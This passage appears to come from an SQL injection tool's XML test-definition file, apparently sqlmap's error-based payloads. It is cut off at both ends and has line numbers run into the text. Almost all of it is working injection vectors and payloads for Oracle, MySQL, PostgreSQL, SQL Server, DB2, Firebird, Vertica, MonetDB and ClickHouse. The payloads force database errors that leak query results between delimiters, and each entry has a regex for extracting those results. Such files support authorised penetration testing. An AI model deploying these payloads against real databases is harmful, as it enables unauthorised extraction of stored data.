DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>598</request>599<response>600<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>601</response>602<details>603<dbms>Oracle</dbms>604</details>605</test>606607<test>608<title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>609<stype>2</stype>610<level>2</level>611<risk>1</risk>612<clause>1,9</clause>613<where>1</where>614<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>615<request>616<payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>617</request>618<response>619<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>620</response>621<details>622<dbms>Oracle</dbms>623<dbms_version>>= 8.1.6</dbms_version>624</details>625</test>626627<test>628<title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>629<stype>2</stype>630<level>2</level>631<risk>3</risk>632<clause>1,9</clause>633<where>2</where>634<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>635<request>636<payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>637</request>638<response>639<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>640</response>641<details>642<dbms>Oracle</dbms>643<dbms_version>>= 8.1.6</dbms_version>644</details>645</test>646647<test>648<title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>649<stype>2</stype>650<level>3</level>651<risk>1</risk>652<clause>1,9</clause>653<where>1</where>654<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>655<request>656<payload>AND 
[RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>657</request>658<response>659<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>660</response>661<details>662<dbms>Oracle</dbms>663</details>664</test>665666<test>667<title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>668<stype>2</stype>669<level>3</level>670<risk>3</risk>671<clause>1,9</clause>672<where>2</where>673<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>674<request>675<payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>676</request>677<response>678<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>679</response>680<details>681<dbms>Oracle</dbms>682</details>683</test>684685<test>686<title>Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>687<stype>2</stype>688<level>4</level>689<risk>1</risk>690<clause>1,9</clause>691<where>1</where>692<vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>693<request>694<payload>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>695</request>696<response>697<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>698</response>699<details>700<dbms>Oracle</dbms>701</details>702</test>703704<test>705<title>Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>706<stype>2</stype>707<level>4</level>708<risk>3</risk>709<clause>1,9</clause>710<where>2</where>711<vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>712<request>713<payload>OR 
[RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>714</request>715<response>716<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>717</response>718<details>719<dbms>Oracle</dbms>720</details>721</test>722723<test>724<title>Firebird AND error-based - WHERE or HAVING clause</title>725<stype>2</stype>726<level>3</level>727<risk>1</risk>728<clause>1</clause>729<where>1</where>730<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>731<request>732<payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>733</request>734<response>735<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>736</response>737<details>738<dbms>Firebird</dbms>739</details>740</test>741742<test>743<title>Firebird OR error-based - WHERE or HAVING clause</title>744<stype>2</stype>745<level>4</level>746<risk>3</risk>747<clause>1</clause>748<where>2</where>749<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>750<request>751<payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>752</request>753<response>754<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>755</response>756<details>757<dbms>Firebird</dbms>758</details>759</test>760761<test>762<title>MonetDB AND error-based - WHERE or HAVING clause</title>763<stype>2</stype>764<level>3</level>765<risk>1</risk>766<clause>1</clause>767<where>1</where>768<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>769<request>770<payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) 
END)||'[DELIMITER_STOP]')</payload>771</request>772<response>773<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>774</response>775<details>776<dbms>MonetDB</dbms>777</details>778</test>779780<test>781<title>MonetDB OR error-based - WHERE or HAVING clause</title>782<stype>2</stype>783<level>4</level>784<risk>3</risk>785<clause>1</clause>786<where>2</where>787<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>788<request>789<payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>790</request>791<response>792<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>793</response>794<details>795<dbms>MonetDB</dbms>796</details>797</test>798799<test>800<title>Vertica AND error-based - WHERE or HAVING clause</title>801<stype>2</stype>802<level>3</level>803<risk>1</risk>804<clause>1</clause>805<where>1</where>806<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>807<request>808<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>809</request>810<response>811<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>812</response>813<details>814<dbms>Vertica</dbms>815</details>816</test>817818<test>819<title>Vertica OR error-based - WHERE or HAVING clause</title>820<stype>2</stype>821<level>4</level>822<risk>3</risk>823<clause>1</clause>824<where>2</where>825<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>826<request>827<payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS 
NUMERIC)</payload>828</request>829<response>830<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>831</response>832<details>833<dbms>Vertica</dbms>834</details>835</test>836837<test>838<title>IBM DB2 AND error-based - WHERE or HAVING clause</title>839<stype>2</stype>840<level>3</level>841<risk>1</risk>842<clause>1</clause>843<where>1</where>844<vector>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>845<request>846<payload>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>847</request>848<response>849<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>850</response>851<details>852<dbms>IBM DB2</dbms>853</details>854</test>855856<test>857<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>858<stype>2</stype>859<level>4</level>860<risk>3</risk>861<clause>1</clause>862<where>1</where>863<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>864<request>865<payload>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>866</request>867<response>868<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>869</response>870<details>871<dbms>IBM DB2</dbms>872</details>873</test>874875<test>876<title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>877<stype>2</stype>878<level>3</level>879<risk>1</risk>880<clause>1,2,3,9</clause>881<where>1</where>882<vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>883<request>884<payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' 
END)||'[DELIMITER_STOP]')</payload>885</request>886<response>887<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>888</response>889<details>890<dbms>ClickHouse</dbms>891</details>892</test>893894<test>895<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>896<stype>2</stype>897<level>4</level>898<risk>3</risk>899<clause>1,2,3,9</clause>900<where>1</where>901<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>902<request>903<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>904</request>905<response>906<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>907</response>908<details>909<dbms>ClickHouse</dbms>910</details>911</test>912913<!--914TODO: if possible, add payload for SQLite, Microsoft Access,915and SAP MaxDB - no known techniques at this time916-->917<!-- End of error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->918919<!-- Error-based tests - LIMIT clause -->920<test>921<title>MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>922<stype>2</stype>923<level>2</level>924<risk>1</risk>925<clause>1,2,3,4,5</clause>926<where>1</where>927<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>928<request>929<payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>930</request>931<response>932<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>933</response>934<details>935<dbms>MySQL</dbms>936<dbms_version>>= 5.1</dbms_version>937</details>938</test>939<!-- End of error-based tests - LIMIT clause -->940941<!-- Error-based tests - Parameter replace -->942<test>943<title>MySQL >= 5.5 error-based - Parameter replace (BIGINT 
UNSIGNED)</title>944<stype>2</stype>945<level>5</level>946<risk>1</risk>947<clause>1,2,3,9</clause>948<where>3</where>949<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>950<request>951<!-- These work as good as ELT(), but are longer952<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>953<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>954-->955<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>956</request>957<response>958<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>959</response>960<details>961<dbms>MySQL</dbms>962<dbms_version>>= 5.5</dbms_version>963</details>964</test>965966<test>967<title>MySQL >= 5.5 error-based - Parameter replace (EXP)</title>968<stype>2</stype>969<level>5</level>970<risk>1</risk>971<clause>1,2,3,9</clause>972<where>3</where>973<vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>974<request>975<payload>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>976</request>977<response>978<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>979</response>980<details>981<dbms>MySQL</dbms>982<dbms_version>>= 5.5</dbms_version>983</details>984</test>985986<test>987<title>MySQL >= 5.6 error-based - Parameter replace 
(GTID_SUBSET)</title>988<stype>2</stype>989<level>5</level>990<risk>1</risk>991<clause>1,2,3,9</clause>992<where>3</where>993<vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>994<request>995<payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>996</request>997<response>998<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>999</response>1000<details>1001<dbms>MySQL</dbms>1002<dbms_version>>= 5.6</dbms_version>1003</details>1004</test>10051006<test>1007<title>MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>1008<stype>2</stype>1009<level>5</level>1010<risk>1</risk>1011<clause>1,2,3,9</clause>1012<where>3</where>1013<vector>JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>1014<request>1015<payload>JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>1016</request>1017<response>1018<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1019</response>1020<details>1021<dbms>MySQL</dbms>1022<dbms_version>>= 5.7.8</dbms_version>1023</details>1024</test>10251026<test>1027<title>MySQL >= 5.0 error-based - Parameter replace (FLOOR)</title>1028<stype>2</stype>1029<level>2</level>1030<risk>1</risk>1031<clause>1,2,3,9</clause>1032<where>3</where>1033<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>1034<request>1035<!-- These work as good as ELT(), but are longer1036<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1037<payload>(SELECT [RANDNUM] FROM(SELECT 
COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1037-->1038<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1039</request>1040<response>1041<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1042</response>1043<details>1044<dbms>MySQL</dbms>1045<dbms_version>>= 5.0</dbms_version>1046</details>1047</test>10481049<test>1050<title>MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)</title>1051<stype>2</stype>1052<level>4</level>1053<risk>1</risk>1054<clause>1,2,3,9</clause>1055<where>3</where>1056<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>1057<request>1058<!-- These work as well as ELT(), but are longer1059<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>1060<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>1061-->1062<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>1063</request>1064<response>1065<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1066</response>1067<details>1068<dbms>MySQL</dbms>1069<dbms_version>>= 5.1</dbms_version>1070</details>1071</test>10721073<test>1074<title>MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>1075<stype>2</stype>1076<level>2</level>1077<risk>1</risk>1078<clause>1,2,3,9</clause>1079<where>3</where>1080<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>1081<request>1082<!-- These work as well as 
ELT(), but are longer1084<payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>1085<payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>1086-->1087<payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>1088</request>1089<response>1090<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1091</response>1092<details>1093<dbms>MySQL</dbms>1094<dbms_version>>= 5.1</dbms_version>1095</details>1096</test>10971098<test>1099<title>PostgreSQL error-based - Parameter replace</title>1100<stype>2</stype>1101<level>2</level>1102<risk>1</risk>1103<clause>1,2,3,9</clause>1104<where>3</where>1105<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1106<request>1107<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>1108</request>1109<response>1110<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1111</response>1112<details>1113<dbms>PostgreSQL</dbms>1114</details>1115</test>11161117<test>1118<title>PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>1119<stype>2</stype>1120<level>5</level>1121<risk>1</risk>1122<clause>1,2,3,9</clause>1123<where>3</where>1124<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1125<request>1126<payload>(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS 
NUMERIC))</payload>1127</request>1128<response>1129<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1130</response>1131<details>1132<dbms>PostgreSQL</dbms>1133</details>1134</test>11351136<test>1137<title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>1138<stype>2</stype>1139<level>3</level>1140<risk>1</risk>1141<clause>1,3</clause>1142<where>3</where>1143<vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>1144<request>1145<payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>1146</request>1147<response>1148<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1149</response>1150<details>1151<dbms>Microsoft SQL Server</dbms>1152<dbms>Sybase</dbms>1153</details>1154</test>11551156<test>1157<title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>1158<stype>2</stype>1159<level>4</level>1160<risk>1</risk>1161<clause>1,3</clause>1162<where>3</where>1163<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>1164<request>1165<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>1166</request>1167<response>1168<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1169</response>1170<details>1171<dbms>Microsoft SQL Server</dbms>1172<dbms>Sybase</dbms>1173</details>1174</test>11751176<test>1177<title>Oracle error-based - Parameter replace</title>1178<stype>2</stype>1179<level>3</level>1180<risk>1</risk>1181<clause>1,3</clause>1182<where>3</where>1183<vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>1184<request>1185<payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN 
([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>1186</request>1187<response>1188<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1189</response>1190<details>1191<dbms>Oracle</dbms>1192</details>1193</test>11941195<test>1196<title>Firebird error-based - Parameter replace</title>1197<stype>2</stype>1198<level>4</level>1199<risk>1</risk>1200<clause>1,3</clause>1201<where>3</where>1202<vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>1203<request>1204<payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>1205</request>1206<response>1207<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1208</response>1209<details>1210<dbms>Firebird</dbms>1211</details>1212</test>12131214<test>1215<title>IBM DB2 error-based - Parameter replace</title>1216<stype>2</stype>1217<level>4</level>1218<risk>1</risk>1219<clause>1,3</clause>1220<where>3</where>1221<vector>RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>1222<request>1223<payload>RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>1224</request>1225<response>1226<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1227</response>1228<details>1229<dbms>IBM DB2</dbms>1230</details>1231</test>1232<!-- End of error-based tests - Parameter replace -->12331234<!-- Error-based tests - ORDER BY, GROUP BY clause -->1235<test>1236<title>MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)</title>1237<stype>2</stype>1238<level>5</level>1239<risk>1</risk>1240<clause>2,3</clause>1241<where>1</where>1242<vector>,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 
8446744073709551610)))x)</vector>1243<request>1244<payload>,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</payload>1245</request>1246<response>1247<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1248</response>1249<details>1250<dbms>MySQL</dbms>1251<dbms_version>>= 5.5</dbms_version>1252</details>1253</test>12541255<test>1256<title>MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)</title>1257<stype>2</stype>1258<level>5</level>1259<risk>1</risk>1260<clause>2,3</clause>1261<where>1</where>1262<vector>,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s)</vector>1263<request>1264<payload>,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)</payload>1265</request>1266<response>1267<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1268</response>1269<details>1270<dbms>MySQL</dbms>1271<dbms_version>>= 5.5</dbms_version>1272</details>1273</test>12741275<test>1276<title>MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>1277<stype>2</stype>1278<level>5</level>1279<risk>1</risk>1280<clause>2,3</clause>1281<where>1</where>1282<vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>1283<request>1284<payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>1285</request>1286<response>1287<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1288</response>1289<details>1290<dbms>MySQL</dbms>1291<dbms_version>>= 5.6</dbms_version>1292</details>1293</test>12941295<test>1296<title>MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause 
(JSON_KEYS)</title>1297<stype>2</stype>1298<level>5</level>1299<risk>1</risk>1300<clause>2,3</clause>1301<where>1</where>1302<vector>,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x)</vector>1303<request>1304<payload>,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)</payload>1305</request>1306<response>1307<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1308</response>1309<details>1310<dbms>MySQL</dbms>1311<dbms_version>>= 5.7.8</dbms_version>1312</details>1313</test>13141315<test>1316<title>MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>1317<stype>2</stype>1318<level>4</level>1319<risk>1</risk>1320<clause>2,3</clause>1321<where>1</where>1322<vector>,(SELECT 1 FROM(SELECT 